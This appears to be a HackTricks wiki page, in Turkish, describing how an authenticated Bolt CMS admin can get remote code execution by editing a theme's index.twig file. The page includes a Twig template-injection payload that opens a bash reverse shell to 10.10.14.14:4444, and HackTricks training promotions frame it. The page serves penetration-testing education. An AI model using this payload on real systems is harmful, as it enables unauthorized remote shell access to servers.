Bolt CMS

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE) Azure Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

• abonelik planlarını kontrol edin!
• 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter’da bizi takip edin 🐦 @hacktricks_live.**
• Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

RCE

Admin olarak giriş yaptıktan sonra (giriş istemine erişmek için /bot adresine gidin), Bolt CMS’de RCE alabilirsiniz:

• Configuration -> View Configuration -> Main Configuration seçeneğini seçin veya URL yoluna gidin /bolt/file-edit/config?file=/bolt/config.yaml
• Tema değerini kontrol edin

• File management -> View & edit templates seçeneğini seçin
• Önceki adımda bulunan tema tabanını seçin (base-2021 bu durumda) ve index.twig seçeneğini seçin
• Benim durumumda bu URL yolunda /bolt/file-edit/themes?file=/base-2021/index.twig
• Bu dosyada yüklemenizi template injection (Twig) ile ayarlayın, örneğin: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
• Ve değişiklikleri kaydedin

• Maintenance -> Clear the cache seçeneğinde önbelleği temizleyin
• Sayfaya tekrar normal bir kullanıcı olarak erişin ve yükleme çalıştırılmalıdır

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE) Azure Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

• abonelik planlarını kontrol edin!
• 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter’da bizi takip edin 🐦 @hacktricks_live.**
• Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.